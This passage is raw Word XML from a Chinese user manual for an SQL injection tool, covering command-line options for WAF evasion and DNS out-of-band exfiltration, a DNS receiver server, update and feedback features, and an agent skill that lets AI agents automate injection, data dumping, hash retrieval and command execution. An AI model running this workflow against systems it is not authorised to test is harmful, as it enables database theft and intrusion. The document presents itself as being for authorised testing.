    <w:p w14:paraId="2C90D738">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SuperSQLInjectionV2.Cmd -u "..." --tamper=space2comment,randomcase --random-agent --delay 300</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AD3029E">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 xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="142660C4">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 DNS 外带</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29DC9372">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SuperSQLInjectionV2.Cmd -u "..." --technique=D --dns-domain=dns.example.com --dbs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="684123CA">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 xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="054D4878">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 盲注提速</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2738161E">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SuperSQLInjectionV2.Cmd -u "..." --threads 5 --dbs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07091394">
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17AD7116">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>10.3 结果与输出</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="100087E4">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>检测结束后在终端打印结果摘要（注入点、类型、数据库、payload）；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58B51426">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">会话落盘 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>session.json</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">（输出目录内），dump 数据同时打印 ASCII 表格并保存 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>CSV</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6285C518">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>文件读取 / 命令执行结果直接打印并写入输出目录。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AE08928">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pageBreakBefore/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>第 11 章 DNS 外带与 DnsServer 部署</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26E11F86">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>11.1 什么时候需要 DNS 外带</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A002608">
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">目标页面完全无回显、且时间盲注过慢或被干扰时，DNS 外带通过数据库发起 DNS 解析（MySQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>LOAD_FILE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">、SQLServer </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>xp_dirtree</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">、Oracle </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>UTL_INADDR</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 等）把数据编码进子域名带出，只需目标能出网解析 DNS 即可。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BB02F8A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>11.2 三种接收方式（GUI「网络设置 - DNSLog」）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E767F64">
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>公共平台</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>：ceye 等在线 DNSLog，填 API 地址模板与 token；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3642F6B4">
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>自建 DnsServer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>：部署到自己的 VPS（见下），域名 NS 指向 VPS；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32BD3BCA">
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>本机内置接收</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>：无需 VPS，主程序直接在本机监听 53（或高位端口）接收解析请求，适合内网 / 靶场。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74E64AB6">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>11.3 DnsServer 部署</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E8199DA">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SuperSQLInjectionV2.DnsServer --domain dns.example.com --port 53 --http 8080 --token SECRET [--answer 127.0.0.1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="239EE34E">
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="auto" w:w="0"/>
        <w:jc w:val="center"/>
        <w:tblBorders>
          <w:top w:val="single" w:sz="4" w:color="B8C2D1"/>
          <w:left w:val="single" w:sz="4" w:color="B8C2D1"/>
          <w:bottom w:val="single" w:sz="4" w:color="B8C2D1"/>
          <w:right w:val="single" w:sz="4" w:color="B8C2D1"/>
          <w:insideH w:val="single" w:sz="4" w:color="B8C2D1"/>
          <w:insideV w:val="single" w:sz="4" w:color="B8C2D1"/>
        </w:tblBorders>
        <w:tblLayout w:type="fixed"/>
        <w:tblCellMar>
          <w:top w:w="40" w:type="dxa"/>
          <w:left w:w="80" w:type="dxa"/>
          <w:bottom w:w="40" w:type="dxa"/>
          <w:right w:w="80" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1392"/>
        <w:gridCol w:w="8353"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1392"/>
            <w:shd w:val="clear" w:fill="1F3B63"/>
          </w:tcPr>
          <w:p w14:paraId="4B17A4DA">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8352"/>
            <w:shd w:val="clear" w:fill="1F3B63"/>
          </w:tcPr>
          <w:p w14:paraId="0AEDB87A">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1392"/>
          </w:tcPr>
          <w:p w14:paraId="4BAF4638">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C7254E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>--domain</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8352"/>
          </w:tcPr>
          <w:p w14:paraId="36C09FF4">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">权威区名（必填，如 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C7254E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>dns.example.com</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>），其 NS 记录指向 VPS</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1392"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="580190A8">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C7254E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>--port</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8352"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="4285ABFC">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">DNS 监听端口（默认 53；Linux 需 root 或 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C7254E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>setcap 'cap_net_bind_service=+ep'</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1392"/>
          </w:tcPr>
          <w:p w14:paraId="02D065DE">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C7254E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>--http</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8352"/>
          </w:tcPr>
          <w:p w14:paraId="0FD724CE">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>HTTP 查询 API 端口（默认 8080）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1392"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="262F1AA4">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C7254E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>--token</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8352"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="2813A026">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>API 访问密钥（为空则不校验，仅限内网 / 防火墙场景）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1392"/>
          </w:tcPr>
          <w:p w14:paraId="3BC25DB2">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C7254E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>--answer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8352"/>
          </w:tcPr>
          <w:p w14:paraId="5374F7AC">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>DNS 应答 IP（默认 127.0.0.1）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="55A2DFAC">
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79374BE4">
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>HTTP API（ceye 兼容格式，主程序直接复用回收链路）：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E3EC71A">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GET /api/records?token=&lt;token&gt;&amp;type=dns&amp;filter=&lt;domain&gt;   # 查询记录</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DF9CF78">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GET /api/clear?token=&lt;token&gt;                              # 清空记录</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EB93462">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="2" w:space="3" w:color="D8DDE6"/>
          <w:left w:val="single" w:sz="2" w:space="3" w:color="D8DDE6"/>
          <w:bottom w:val="single" w:sz="2" w:space="3" w:color="D8DDE6"/>
          <w:right w:val="single" w:sz="2" w:space="3" w:color="D8DDE6"/>
        </w:pBdr>
        <w:shd w:val="clear" w:fill="F5F6F8"/>
        <w:spacing w:after="0" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="227"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GET /healthz                                              # 健康检查</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59530F30">
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="563D4914">
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>部署后主程序侧配置：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BC8065E">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>DNSLog 域名</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>dns.example.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23A03A60">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>DNSLog API 地址模板</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>http://&lt;vps&gt;:8080/api/records?token={token}&amp;type=dns&amp;filter={domain}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FEA9C8C">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="4" w:color="1F3B63"/>
        </w:pBdr>
        <w:ind w:left="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="555F6E"/>
        </w:rPr>
        <w:t xml:space="preserve">Windows 下非管理员绑定通配前缀会回退为仅本机监听；需外部访问请以管理员运行，或先执行 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="555F6E"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>netsh http add urlacl url=http://+:&lt;port&gt;/ user=Everyone</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="555F6E"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E5701C6">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pageBreakBefore/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>第 12 章 软件更新与问题反馈</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C780450">
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>「关于」页提供三张卡片：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A803BF8">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>软件介绍</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>：版本、核心能力与免责声明；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43BF3CE2">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>软件更新</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">：更新服务连接配置（服务地址 / 应用标识 / 渠道 / 客户端Key）写在 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>config/update.ini</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 中随软件分发（UI 不提供修改，改后重启生效，文件缺失时自动按默认值重建）；卡片内勾选"自动检测"后启动时后台检测新版本，点击"检查更新"手动查询，检测到新版本后可下载更新包（zip）到软件运行目录，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>关闭软件后解压覆盖</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>即可完成升级；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51D29C68">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>问题反馈</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">：在线提交问题 / 建议（POST </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>/api/client/feedback</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">，自动附带当前版本号），可留联系方式便于回访；依赖 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>config/update.ini</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 中的服务地址可达，服务不可达不影响软件正常使用。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64F6BBAE">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pageBreakBefore/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>第 13 章 AI 智能体集成（supersqlinjectionv2-cmd skill）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F932C92">
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">仓库内置 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>skills/supersqlinjectionv2-cmd/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 智能体技能包，可被 Kimi Work 等 AI 智能体直接加载，用自然语言驱动 SuperSQLInjectionV2.Cmd 完成授权测试：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77EA0D14">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>skill 内置 Windows / Linux 预编译二进制（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>assets/bin/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>），macOS 见目录内说明；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20E92A92">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>智能体按 skill 约定的工作流自动执行：检测 → 复用注入点取数（环境 / 库表列 / dump / Hash / 权限）→ 文件与命令 → 回收 CSV 结果并汇报绝对路径；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E4376BA">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>适用前提与手工使用一致：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>目标必须在授权范围内</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>（本地靶场、自有系统、授权渗透）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49D3B24C">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pageBreakBefore/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>第 14 章 常见问题 FAQ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02D9B544">
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>Q1：检测不到注入，但手工确认存在？</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">按顺序排查：① 确认注入标记位置正确；② 升到 Level 2–3；③ 用 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>--dbms</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
